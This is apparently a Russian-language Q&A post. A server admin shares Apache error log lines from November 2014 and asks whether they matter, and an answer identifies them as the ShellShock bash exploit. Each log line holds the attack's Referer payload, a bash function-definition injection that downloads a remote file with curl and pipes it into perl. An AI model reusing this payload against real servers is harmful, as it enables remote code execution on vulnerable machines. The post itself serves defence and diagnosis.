Я обнаружил некоторые странные Запросы HTTP в своих апачских журналах, но я не уверен относительно того, должен ли я быть заинтересован ими или нет?
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
Какие-либо идеи?
Это ShellShock, атака / эксплойт уязвимости bash. Более подробная информация и способы проверки вашей уязвимости приведены, например, здесь: http://dshield.org/diary.html?date=2014-09-25 .